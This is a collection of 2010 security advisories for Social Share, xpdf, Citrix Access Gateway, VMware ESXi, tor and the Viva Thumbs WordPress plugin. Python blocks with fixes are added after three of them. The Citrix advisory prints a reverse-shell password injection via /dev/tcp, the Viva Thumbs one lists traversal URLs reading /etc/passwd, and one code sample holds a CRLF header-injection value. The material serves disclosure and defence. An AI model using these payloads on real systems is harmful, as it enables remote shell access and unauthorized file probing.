www.eVuln.com : HTTP Response Splitting in Social Share
www.eVuln.com advisory: HTTP Response Splitting in Social Share
Summary: http://evuln.com/vulns/168/summary.html
Details: http://evuln.com/vulns/168/description.html

---Summary---
eVuln ID: EV0168
Software: Social Share
Vendor: n/a
Version: 2010-06-05
Critical Level: low
Type: HTTP Response Splitting
Status: Unpatched. No reply from developer(s)
PoC: Available
Solution: Not available
Discovered by: Aliaksandr Hartsuyeu ( http://evuln.com/ )

---Description---
$_SERVER["HTTP_REFERER"] value is included in an HTTP response header sent to a web user without being validated for malicious characters.
Vulnerable script: vote.php

---PoC/Exploit---
PoC code is available at: http://evuln.com/vulns/168/exploit.html

---Solution---
Not available

---Credit---
Vulnerability discovered by Aliaksandr Hartsuyeu
http://evuln.com/penetration-test.html - website penetration testing service
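Added illustration, not part of the eVuln advisory (which publishes its PoC separately) and not the Social Share plugin's code: the check a script such as vote.php needs before it copies $_SERVER["HTTP_REFERER"] into a response header. It is written in Python rather than PHP so that it runs stand-alone; the origin example.test, the sample Referer values and the redirect logic are constructed assumptions.

```python
import re
from typing import Optional

# Constructed sample Referer values (not taken from the advisory). The second
# one carries the CR/LF pair that HTTP response splitting depends on.
SAMPLE_REFERERS = {
    "benign": "http://example.test/gallery/item?id=42",
    "crlf": "http://example.test/\r\nSet-Cookie: injected=1\r\n\r\n<html>",
}

# A CR, LF or NUL inside a header value ends the header line (or the whole
# header block), which is what lets a client-supplied value add headers or
# an entire second response body.
_FORBIDDEN = re.compile(r"[\r\n\x00]")

# Assumed site origin; a real deployment would read this from configuration.
_OWN_ORIGIN = re.compile(r"https?://example\.test(/[^\s]*)?")


def is_safe_header_value(value: str) -> bool:
    """True if the value may be placed in a response header verbatim.
    Run this on the *decoded* value: a check done before a later urldecode
    would miss %0d%0a."""
    return _FORBIDDEN.search(value) is None


def vulnerable_redirect_header(referer: str) -> str:
    """The pattern the advisory describes: the Referer is copied into a
    Location header with no validation. Kept only to contrast with the fix."""
    return "Location: " + referer


def safe_redirect_header(referer: Optional[str], fallback: str = "/") -> str:
    """Hardened variant: refuse line breaks, and only redirect back to a path
    on our own origin so the header cannot be used as an open redirect either."""
    if not referer or not is_safe_header_value(referer):
        return "Location: " + fallback
    m = _OWN_ORIGIN.fullmatch(referer)
    if m is None:
        return "Location: " + fallback
    return "Location: " + (m.group(1) or "/")


def header_lines(raw_header: str) -> int:
    """Count the header lines a recipient would see in the emitted text; a
    safe value yields exactly one. Handy as a regression test or proxy check."""
    return len([ln for ln in raw_header.split("\r\n") if ln])
```

Whatever the server language, the test belongs at the point where the decoded value is about to be written into the header, and the fallback should be a fixed location rather than another client-controlled field.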
[SECURITY] [DSA 2135-1] New xpdf packages fix several vulnerabilities
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-2135-1                   secur...@debian.org
http://www.debian.org/security/                        Moritz Muehlenhoff
December 21, 2010                      http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : xpdf
Vulnerability  : several
Problem type   : local(remote)
Debian-specific: no
CVE Id(s)      : CVE-2010-3702 CVE-2010-3704

Joel Voss of Leviathan Security Group discovered two vulnerabilities in
xpdf rendering engine, which may lead to the execution of arbitrary code
if a malformed PDF file is opened.

For the stable distribution (lenny), these problems have been fixed in
version 3.02-1.4+lenny3.

For the upcoming stable distribution (squeeze) and the unstable
distribution (sid), these problems don't apply, since xpdf has been
patched to use the Poppler PDF library.

We recommend that you upgrade your poppler packages.

Upgrade instructions
- --------------------

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

- -------------------------------------------------------------------------------

For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-annou...@lists.debian.org
Package info: `apt-cache show ' and http://packages.debian.org/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (GNU/Linux)

iEYEARECAAYFAk0Q5M4ACgkQXm3vHE4uyloQDACfabZRl0gOaEHypK8Ovaggiyte
XHgAn18UdLjvYoXkxzbPC7NqNvsmaCg6
=UpYe
-----END PGP SIGNATURE-----
VSR Advisories: Citrix Access Gateway Command Injection Vulnerability
VSR Security Advisory
http://www.vsecurity.com/

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Advisory Name: Citrix Access Gateway Command Injection Vulnerability
Release Date:  2010-12-21
Application:   Citrix Access Gateway
Versions:      Access Gateway Enterprise Edition (up to 9.2-49.8)
               Access Gateway Standard & Advanced Edition (prior to 5.0)
Severity:      High
Author:        George D. Gal
Vendor Status: Updated Software Released, NT4 Authentication Removed [2]
CVE Candidate: CVE-2010-4566
Reference:     http://www.vsecurity.com/resources/advisory/20101221-1/
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Product Description
-------------------
From [1]:
"Citrix(R) Access Gateway(TM) is a secure application access solution that
provides administrators granular application-level control while empowering
users with remote access from anywhere. It gives IT administrators a single
point to manage access control and limit actions within sessions based on
both user identity and the endpoint device, providing better application
security, data protection, and compliance management."

Vulnerability Overview
----------------------
On August 2nd, VSR identified a vulnerability in Citrix Access Gateway within
the way user authentication credentials are handled. Under certain
configuration settings it appears that user credentials are passed as
arguments to a command line program to authenticate the user. A lack of data
validation and the mechanism in which the external program is spawned results
in the potential for command injection and arbitrary command execution on the
Access Gateway.

Vulnerability Details
---------------------
The Citrix Access Gateway provides support for multiple authentication types.
When utilizing the external legacy NTLM authentication module known as
ntlm_authenticator the Access Gateway spawns the Samba 'samedit' command line
utility to verify a user's identity and password.

By embedding shell metacharacters in the web authentication form it is
possible to execute arbitrary commands on the Access Gateway. The following
commands are executed by the ntlm_authenticator during this process:

vpnadmin 10130 0.0 0.0 2104 976 ? S 15:02 0:00 sh -c /usr/local/samba/bin/samedit -c 'samuser username -a' -U <>%<> -p 139 -S xxx.xxx.xxx.xxx > /tmp/samedit-samuser-stdout.50474096 2> /dev/null
vpnadmin 10131 0.0 0.1 3852 1528 ? S 15:02 0:00 /usr/local/samba/bin/samedit -c samuser username -a -U <>% -p 139 -S xxx.xxx.xxx.xxx

By submitting a password value as shown below, it is possible to establish a
reverse shell to a netcat listener:

| bash -i >& /dev/tcp/<>/<> 0>&1 &

Using a simple ping command in the password field an attacker could use
timing attacks to verify the presence of the vulnerability:

| ping -c 10 <>

The ping command above will attempt to send 10 ICMP echo requests to the
target host, resulting in a noticeable delay easily detected by
vulnerability scanners.

Versions Affected
-----------------
Testing was performed against a Citrix Access Gateway 2000 version 4.5.7.
According to the vendor this vulnerability affects all versions of Access
Gateway Enterprise Edition up to version 9.2-49.8, and all versions of the
Access Gateway Standard and Advanced Editions prior to Access Gateway 5.0.

Vendor Response
---------------
The following timeline details the vendor's response to the reported issue:

2010-08-06  Citrix was provided a draft advisory.
2010-08-10  Citrix acknowledged receipt of draft advisory.
2010-08-16  VSR follow-up to determine confirmation of issue.
2010-08-16  Citrix confirmed issue.
2010-09-14  VSR follow-up to determine status of issue.
2010-09-29  VSR follow-up to determine status of issue.
2010-09-30  Citrix confirmed continued investigation of the issue.
2010-10-19  VSR follow-up to determine status of issue.
2010-10-26  Citrix verified issue only exists in NT4 authentication feature.
2010-12-01  VSR follow-up to determine status of issue.
2010-12-02  Citrix confirmed December 14th release of security bulletin.
2010-12-14  Citrix releases security bulletin.
2010-12-20  CVE assigned
2010-12-21  VSR releases advisory.

The Citrix advisory may be obtained at:
http://support.citrix.com/article/CTX127613

Recommendation
--------------
Citrix has indicated that this vulnerability only affects legacy NT4
authentication which has been removed from the latest release of the device
firmware.

Common Vulnerabilities and Exposures (CVE) Information
------------------------------------------------------
The Common Vulnerabilities and Exposures (CVE) project has assigned the
number CVE-2010-4566 to this issue. This is a candidate for inclusion in the
CVE list (http://cve.mitre.org), which standardizes names for security
problems.

Acknowledgem
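Added example, not VSR's or Citrix's code: the ps output above shows credentials spliced into a string handed to `sh -c`. The block below models that construction, shows how a shell tokenizer exposes injected control operators (a check that fits in a test suite or a log review of spawned command lines), and gives the shell-free argv form that removes the injection. The samedit path comes from the advisory; the domain-controller address, the username allow-list and the sample credentials are constructed assumptions.

```python
import re
import shlex
import subprocess
from typing import List

# Path from the advisory's ps output; the DC address is a placeholder
# (the advisory masks it as xxx.xxx.xxx.xxx).
SAMEDIT = "/usr/local/samba/bin/samedit"
DC_HOST = "192.0.2.10"

_PUNCT = "();<>|&"   # control characters a POSIX shell interprets


def vulnerable_command_line(username: str, password: str) -> str:
    """The construction visible in the advisory: credentials spliced into one
    string destined for `sh -c`. Returned as text, never executed here."""
    return (f"{SAMEDIT} -c 'samuser {username} -a' -U {username}%{password} "
            f"-p 139 -S {DC_HOST} > /tmp/samedit-samuser-stdout 2> /dev/null")


def shell_operators(cmdline: str) -> List[str]:
    """Tokenize the string the way a POSIX shell would and return the control
    operators it contains, in order. The benign command line legitimately has
    two redirections; anything beyond that came from a user-supplied field."""
    lex = shlex.shlex(cmdline, posix=True, punctuation_chars=_PUNCT)
    lex.whitespace_split = True
    return [tok for tok in lex if tok and all(c in _PUNCT for c in tok)]


_USERNAME_RE = re.compile(r"[A-Za-z0-9._-]{1,64}")


def safe_argv(username: str, password: str) -> List[str]:
    """Argument vector for the same samedit call with no shell in between:
    each list element reaches samedit as exactly one argv entry, so '|' or ';'
    in the password is just a character. The username is additionally
    allow-listed because it is embedded in samedit's own -c sub-command."""
    if not _USERNAME_RE.fullmatch(username):
        raise ValueError("username contains characters outside the allow-list")
    if "\0" in password:
        raise ValueError("NUL byte in password")
    return [SAMEDIT, "-c", f"samuser {username} -a",
            "-U", f"{username}%{password}", "-p", "139", "-S", DC_HOST]


def run_authenticator(argv: List[str], timeout: float = 10.0) -> bool:
    """Execute without a shell (shell=False is the default; stated explicitly).
    The password is still visible in the process list this way, exactly as the
    advisory's ps output shows; if the tool can read it from stdin, prefer that."""
    proc = subprocess.run(argv, shell=False, stdout=subprocess.PIPE,
                          stderr=subprocess.DEVNULL, timeout=timeout, check=False)
    return proc.returncode == 0
```

Quoting the interpolated values (shlex.quote or its equivalent) would also stop this particular injection, but the argv form is preferable because it does not depend on getting the quoting right for every field and every shell.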
VMSA-2010-0020 VMware ESXi 4.1 Update Installer SFCB Authentication Flaw
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- -----------------------------------------------------------------------
                   VMware Security Advisory

Advisory ID:       VMSA-2010-0020
Synopsis:          VMware ESXi 4.1 Update Installer SFCB Authentication Flaw
Issue date:        2010-12-21
Updated on:        2010-12-21
CVE numbers:       CVE-2010-4573
- -----------------------------------------------------------------------

1. Summary

   VMware ESXi 4.1 Update Installer might introduce a SFCB Authentication
   Flaw.

2. Relevant releases

   VMware ESXi 4.1 if upgraded from ESXi 3.5 or ESXi 4.0 with a modified
   SFCB configuration file.

3. Problem Description

 a. ESXi 4.1 Update Installer SFCB Authentication Flaw

   Under certain conditions, the ESXi 4.1 installer that upgrades an
   ESXi 3.5 or ESXi 4.0 host to ESXi 4.1 incorrectly handles the SFCB
   authentication mode. The result is that SFCB authentication could
   allow login with any username and password combination.

   An ESXi 4.1 host is affected if all of the following apply:
   - ESXi 4.1 was upgraded from ESXi 3.5 or ESXi 4.0.
   - The SFCB configuration file /etc/sfcb/sfcb.cfg was modified prior
     to the upgrade.
   - The sfcbd daemon is running (sfcbd runs by default).

   Workaround

   A workaround that can be applied to ESXi 4.1 is described in VMware
   Knowledge Base Article KB 1031761

   The Common Vulnerabilities and Exposures project (cve.mitre.org) has
   assigned the name CVE-2010-4573 to this issue.

   Column 4 of the following table lists the action required to
   remediate the vulnerability in each release, if a solution is
   available.

   VMware         Product   Running  Replace with/
   Product        Version   on       Apply Patch
   =============  ========  =======  =================
   VirtualCenter  any       Windows  not affected

   hosted *       any       any      not affected

   ESXi           4.1       ESXi     see KB 1031761 for workaround **
   ESXi           4.0       ESXi     not affected
   ESXi           3.5       ESXi     not affected

   ESX            any       ESX      not affected

   * hosted products are VMware Workstation, Player, ACE, Server, Fusion.
   ** ESXi 4.1 is only affected if upgraded from ESXi 3.5 or ESXi 4.0
      with a modified SFCB configuration file.

4. Solution

   Please review the patch/release notes for your product and version
   and verify the md5sum of your downloaded file.

   ESXi 4.1
   Workaround described in VMware Knowledge Base Article KB 1031761
   http://kb.vmware.com/kb/1031761

5. References

   CVE numbers
   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4573

- -----------------------------------------------------------------------

6. Change log

   2010-12-21  VMSA-2010-0020
   Initial security advisory after release of VMware knowledge base
   article that documents workaround on 2010-12-21.

- -----------------------------------------------------------------------

7. Contact

   E-mail list for product security notifications and announcements:
   http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce

   This Security Advisory is posted to the following lists:

     * security-announce at lists.vmware.com
     * bugtraq at securityfocus.com
     * full-disclosure at lists.grok.org.uk

   E-mail: security at vmware.com
   PGP key at: http://kb.vmware.com/kb/1055

   VMware Security Center
   http://www.vmware.com/security

   VMware Security Advisories
   http://www.vmware.com/security/advisories

   VMware security response policy
   http://www.vmware.com/support/policies/security_response.html

   General support life cycle policy
   http://www.vmware.com/support/policies/eos.html

   VMware Infrastructure support life cycle policy
   http://www.vmware.com/support/policies/eos_vi.html

   Copyright 2010 VMware Inc. All rights reserved.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.16 (GNU/Linux)

iEYEARECAAYFAk0RJaQACgkQS2KysvBH1xk5gwCfeuwzOhjNuAQKDY/OGqVevkFk
yv4An04Kf4+MQr2Lxg1ObnrhblLZw280
=579r
-----END PGP SIGNATURE-----
[SECURITY] [DSA-2136-1] New tor packages fix potential code execution
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-2136-1                   secur...@debian.org
http://www.debian.org/security/                          Raphael Geissert
December 21, 2010                      http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : tor
Vulnerability  : buffer overflow
Problem type   : remote
Debian-specific: no
CVE Id         : CVE-2010-1676

Willem Pinckaers discovered that Tor, a tool to enable online anonymity,
does not correctly handle all data read from the network. By supplying
specially crafted packets a remote attacker can cause Tor to overflow its
heap, crashing the process. Arbitrary code execution has not been
confirmed but there is a potential risk.

In the stable distribution (lenny), this update also includes an update
of the IP address for the Tor directory authority gabelmoo and addresses
a weakness in the package's postinst maintainer script.

For the stable distribution (lenny) this problem has been fixed in
version 0.2.1.26-1~lenny+4.

For the testing distribution (squeeze) and the unstable distribution
(sid), this problem has been fixed in version 0.2.1.26-6.

We recommend that you upgrade your tor packages.

Upgrade instructions
- --------------------

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

- -------------------------------------------------------------------------------

For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-annou...@lists.debian.org
Package info: `apt-cache show ' and http://packages.debian.org/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (GNU/Linux)

iEYEARECAAYFAk0RRVsACgkQYy49rUbZzlp2mACeP+489ptl1vz0BQoJW1F2w9x4
K4oAnAjVvOvl898mVCeSJRhkKtEXT5nG
=eMo2
-----END PGP SIGNATURE-----
http://www.procheckup.com/vulnerability_manager/vulnerabilities/pr10-04
PR10-04 Directory traversal limited to file validation within Viva thumbs WordPress add-on

Advisory publicly released: Tuesday, 21 December 2010
Vulnerability found: Thursday, 4 February 2010
Vendor informed: Monday, 8 February 2010
Severity level: Low/Medium

Credits
Richard Brain of ProCheckUp Ltd (www.procheckup.com)

Description
Viva Thumbs resizes and displays images, as part of a popular WordPress plugin. ProCheckUp has discovered that Viva Thumbs is vulnerable to a directory traversal attack within the image display functionality; the directory traversal attack is limited to file existence validation.

Note: tested on Viva Thumbs running on the Linux operating system.

Proof of concept
The following demonstrates the traversal flaw:

1) Vulnerable to directory traversal
http://target-domain.foo/show_image_NpAdvCatPG.php?cache=false&cat=1&filename=/../../../../../../etc/passwd
http://target-domain.foo/show_image_NpAdvHover.php?cache=false&cat=0&filename=/../../../../../../etc/passwd
http://target-domain.foo/show_image_NpAdvInnerSmall.php?cache=false&cat=1&filename=/../../../../../../etc/hosts
http://target-domain.foo/show_image_NpAdvMainFea.php?cache=false&cat=1&filename=/../../../../../../etc/passwd
http://target-domain.foo/show_image_NpAdvMainPGThumb.php?cache=false&cat=1&filename=/../../../../../../etc/hosts
http://target-domain.foo/show_image_NpAdvFeaThumb.php?cache=false&cat=1&filename=/../../../../../../etc/hosts
http://target-domain.foo/show_image_NpAdvSecondaryRight.php?cache=false&cat=1&filename=/../../../../../../etc/hosts
http://target-domain.foo/show_image_NpAdvSideFea.php?cache=false&cat=1&filename=/../../../../../../etc/hosts
http://target-domain.foo/show_image_NpAdvSinglePhoto.php?cache=false&cat=1&filename=/../../../../../../etc/hosts
http://target-domain.foo/show_image_NpAdvSubFea.php?cache=false&cat=1&filename=/../../../../../../etc/hosts

Consequences:
The existence of files can be validated on the system, outside the WordPress webroot.

How to fix
None available

References

Legal
Copyright 2010 ProCheckUp Ltd. All rights reserved. Permission is granted for copying and circulating this Bulletin to the Internet community for the purpose of alerting them to problems, if and only if, the Bulletin is not edited or changed in any way, is attributed to Procheckup, and provided such reproduction and/or distribution is performed for non-commercial purposes. Any other use of this information is prohibited. Procheckup is not liable for any misuse of this information by any third party.
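Added example, not ProCheckUp's code and not the Viva Thumbs PHP: a Python model of the file-existence oracle the advisory describes (a request parameter concatenated onto the image directory and then tested for existence) next to the containment check that closes it. The temporary directory, the file name photo1.jpg and the extension allow-list are constructed for the demonstration.

```python
import os
import tempfile
from typing import Optional

# Assumption: the script only ever serves thumbnails of these types.
ALLOWED_EXTENSIONS = {".jpg", ".jpeg", ".png", ".gif"}


def build_demo_dir() -> str:
    """Create a throwaway image directory holding one constructed file so the
    checks below can run offline."""
    base = tempfile.mkdtemp(prefix="vivathumbs-demo-")
    with open(os.path.join(base, "photo1.jpg"), "wb") as fh:
        fh.write(b"\xff\xd8\xff\xd9")   # constructed: JPEG SOI/EOI markers only
    return base


def vulnerable_exists(image_dir: str, filename: str) -> bool:
    """Mirrors the flaw in the advisory: the filename parameter is appended to
    the image directory and tested for existence, so /../../etc/passwd walks
    out of the webroot and the True/False answer becomes an oracle for any
    path on the host."""
    return os.path.exists(image_dir + filename)


def resolve_inside(base_dir: str, filename: str) -> Optional[str]:
    """Resolve filename relative to base_dir and return the real path only if
    it stays inside base_dir; None for traversal, absolute paths and symlinks
    that lead outside."""
    base = os.path.realpath(base_dir)
    # Strip leading separators so an absolute filename cannot replace base.
    candidate = os.path.realpath(os.path.join(base, filename.lstrip("/\\")))
    try:
        if os.path.commonpath([base, candidate]) != base:
            return None
    except ValueError:          # different drives on Windows
        return None
    return candidate


def safe_exists(image_dir: str, filename: str) -> bool:
    """Hardened check: containment first, then the extension allow-list, and
    the same False for 'outside the directory' as for 'not there', so the
    response says nothing about the rest of the filesystem."""
    path = resolve_inside(image_dir, filename)
    if path is None:
        return False
    if os.path.splitext(path)[1].lower() not in ALLOWED_EXTENSIONS:
        return False
    return os.path.isfile(path)
```

Resolving with realpath before the comparison matters: a string-level check for ".." misses encoded variants and symlinks, whereas comparing resolved paths covers both, and answering identically for rejected and missing files removes the oracle the advisory's severity rests on.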